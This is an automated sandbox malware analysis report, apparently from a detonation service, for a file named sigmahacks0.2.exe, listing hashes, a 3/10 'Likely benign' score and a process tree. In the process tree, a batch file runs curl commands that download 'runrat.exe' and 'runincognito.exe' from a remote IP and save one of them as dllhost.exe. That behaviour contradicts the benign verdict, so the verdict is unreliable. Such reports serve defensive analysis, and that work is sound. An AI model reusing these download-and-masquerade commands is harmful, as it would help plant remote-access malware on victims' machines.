Malware Analysis Report

2025-04-14 03:22

Sample ID 240612-t338lsvhpr
Target sigmahacks0.2.exe
SHA256 3c8d5c2b52242137822451d7ce4ba46e04087a8de82a427a4c1450aa09e85af3
Tags
score
3/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
3/10

SHA256

3c8d5c2b52242137822451d7ce4ba46e04087a8de82a427a4c1450aa09e85af3

Threat Level: Likely benign

The file sigmahacks0.2.exe was found to be: Likely benign.

Malicious Activity Summary


Unsigned PE

Suspicious use of WriteProcessMemory

MITRE ATT&CK

N/A

Analysis: static1

Detonation Overview

Reported

2024-06-12 16:35

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-12 16:35

Reported

2024-06-12 16:37

Platform

win10v2004-20240508-en

Max time kernel

63s

Max time network

50s

Command Line

"C:\Users\Admin\AppData\Local\Temp\sigmahacks0.2.exe"

Signatures

Processes

C:\Users\Admin\AppData\Local\Temp\sigmahacks0.2.exe

"C:\Users\Admin\AppData\Local\Temp\sigmahacks0.2.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\465F.tmp\4660.tmp\4671.bat C:\Users\Admin\AppData\Local\Temp\sigmahacks0.2.exe"

C:\Windows\system32\curl.exe

curl -s -o dllhost.exe "http://45.157.232.173:5151/downloads/runincognito.exe"

C:\Windows\system32\dllhost.exe

dllhost.exe

C:\Windows\system32\curl.exe

curl -s -o Incognito.exe "http://45.157.232.173:5151/downloads/runrat.exe"

Network

Country Destination Domain Proto
DE 45.157.232.173:5151 tcp
DE 45.157.232.173:5151 tcp

Files

C:\Users\Admin\AppData\Local\Temp\465F.tmp\4660.tmp\4671.bat

MD5 aa6cd2e5eea38082199a03f164836f90
SHA1 93f21ab96c7f4b66e3d6d221414bbd7f82b3a293
SHA256 035ddce5103edf606392d566ab937bd060c1e6510eb5ffd7ffa1fc8c71f5853a
SHA512 dde5c9196df1246b5bbd69a7926fe8aa514c82daa01ead3eca1e5b1fdeb2c86678881cfabf8bf78a501be366a272c6aac92849a77d58e5db2bd6cda511a6cc06